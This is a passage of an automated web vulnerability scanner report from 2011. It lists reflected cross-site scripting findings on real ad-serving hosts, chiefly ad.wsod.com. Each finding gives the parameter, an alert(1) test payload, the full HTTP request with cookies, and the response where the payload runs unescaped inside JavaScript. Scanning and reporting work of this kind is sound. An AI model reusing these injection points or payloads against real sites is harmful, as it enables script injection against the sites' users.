HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 711 Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 641 Connection: close
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/ Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 848
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:40 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/ Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 852
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.writ ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/ Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 846
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() {
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/ Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 857
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function ...[SNIP]...
1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:54:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/ Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 851
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image() { document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:52:49 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1679
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Wed, 02 Feb 2011 21:53:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
